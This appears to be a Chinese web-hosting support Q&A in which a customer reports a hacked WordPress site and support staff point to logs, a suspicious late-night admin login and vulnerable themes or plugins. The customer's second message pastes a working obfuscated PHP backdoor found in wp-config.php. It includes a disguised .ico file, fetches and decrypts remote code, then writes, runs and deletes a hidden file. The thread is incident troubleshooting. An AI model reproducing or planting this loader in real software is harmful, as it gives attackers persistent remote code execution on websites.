网站里被写入好多乱马七糟的PHP文件 应该是被黑了

问：网站里被写入好多乱马七糟的PHP文件 应该是被黑了  能否提供源头日志,网站里被写入好多乱马七糟的PHP文件 应该是被黑了

答：您好，当前空间中没有查看到对应的异常php文件，请核实您是否已经删除。

请根据您对应的php文件生成的时间查看对应的日志即可，查看对应的备份查看到对应的z1.php,不清楚是否是您反馈的异常文件，查看到对应的实际是7月13日，当前将对应的日志拷贝到log目录，请自行进行查看分析。查看到您对应的网站程序使用的是wordpress程序，这个一个成熟的软件，一般被黑大部分都是由于网站主题或者插件存在后门或者漏洞导致非常感谢您长期对我司的支持!

问：我手工删了很多   这是wp config里的一段

<?php/*23531*/
@include \”\\057home\\057scie\\144itez\\163gcvi\\161ezdz\\151ztme\\057wwwr\\157ot/w\\160-con\\164ent/\\165ploa\\144s/js\\137comp\\157ser/\\0569edb\\064905.\\151co\”;
/*23531*/@ini_set(\’display_errors\’, \’0\’);error_reporting(0);if (!$npDcheckClassBgp) {$ea = \’_shaesx_\’; $ay = \’get_data_ya\’; $ae = \’decode\’; $ea = str_replace(\’_sha\’, \’bas\’, $ea); $ao = \’wp_cd\’; $ee = $ea.$ae; $oa = str_replace(\’sx\’, \’64\’, $ee); $algo = \’portofol\’; $pass = \”Zgc5c4MXrLckaAsF8ZNUZvecNleUNbhY3iKMG /NuQE=\”;if (ini_get(\’allow_url_fopen\’)) {    function get_data_ya($url) {        $data = file_get_contents($url);        return $data;    }}else {    function get_data_ya($url) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_HEADER, 0);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);        $data = curl_exec($ch);        curl_close($ch);        return $data;    }}function wp_cd($fd, $fa=\”\”){   $fe = \”wp_frmfunct\”;   $len = strlen($fd);   $ff = \’\’;   $n = $len>100 ? 8 : 2;   while( strlen($ff)<$len )   {      $ff .= substr(pack(\’H*\’, sha1($fa.$ff.$fe)), 0, $n);   }   return $fd^$ff;}$reqw = $ay($ao($oa(\”$pass\”), \’wp_function\’));preg_match(\’#gogo(.*)enen#is\’, $reqw, $mtchs);$dirs = glob(\”*\”, GLOB_ONLYDIR);foreach ($dirs as $dira) { if (fopen(\”$dira/.$algo\”, \’w\’)) { $ura = 1; $eb = \”$dira/\”; $hdl = fopen(\”$dira/.$algo\”, \’w\’); break; } $subdirs = glob(\”$dira/*\”, GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen(\”$subdira/.$algo\”, \’w\’)) { $ura = 1; $eb = \”$subdira/\”; $hdl = fopen(\”$subdira/.$algo\”, \’w\’); break; } }}if (!$ura && fopen(\”.$algo\”, \’w\’)) { $ura = 1; $eb = \’\’; $hdl = fopen(\”.$algo\”, \’w\’); }fwrite($hdl, \”<?php\\n$mtchs[1]\\n?>\”);fclose($hdl);include(\”{$eb}.$algo\”);unlink(\”{$eb}.$algo\”);$npDcheckClassBgp = \’aue\’;}?>
Deprecated: Function create_function() is deprecated in /home/scieditezsgcviqezdziztme/www/wp-content/uploads/2019/07/data-class-wc-data-store-wp.php on line 1

答：您好，查看到是文件被篡改，查看到是7月11日，请查看对应的网站日志，查看到存在后台登陆记录，请核实对应的11日晚上11点是否是您自行操作

wordpress程序，这个一个成熟的软件，一般被黑大部分都是由于网站主题或者插件存在后门或者漏洞导致，请详细检测您对应的主题和插件，非常感谢您长期对我司的支持!